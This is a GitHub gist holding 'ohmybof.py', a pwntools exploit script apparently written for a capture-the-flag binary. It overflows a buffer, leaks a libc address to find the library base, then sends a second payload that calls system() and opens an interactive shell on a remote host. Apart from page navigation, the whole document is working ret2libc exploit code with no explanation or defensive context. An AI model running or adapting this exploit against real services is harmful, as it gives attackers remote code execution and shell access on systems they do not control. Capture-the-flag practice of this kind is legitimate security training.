Skip to content

Instantly share code, notes, and snippets.

@crixpwn

crixpwn/ohmybof.py

Created May 28, 2017 00:47
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save crixpwn/d67dc2aca64160533da8617028268f7d to your computer and use it in GitHub Desktop.
Save crixpwn/d67dc2aca64160533da8617028268f7d to your computer and use it in GitHub Desktop.
Download ZIP
Raw
ohmybof.py
from pwn import *
from hexdump import *
#p = process("./ohmybof")
p = remote("223.194.105.182", 41001)
def main():
popret = 0x80482ad
wr = 0x080483E3
payload = "A" * 24
payload += p32(wr)
p.recvuntil("attack: " + "\x00")
p.send(payload)
leak = u32(p.recv(4))
log.info("leak: " + hex(leak))
base = leak - 0x18637
log.info("libc base: " + hex(base))
system = base + 0x3ada0
cmd = base + 0x15b82b
p.recv(1024)
data = 0x0804A010
pop3ret = 0x8048489
payload = "\x00" * 24
payload += p32(system)
payload += "AAAA"
payload += p32(cmd)
p.send(payload)
p.interactive()
if __name__=='__main__':
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment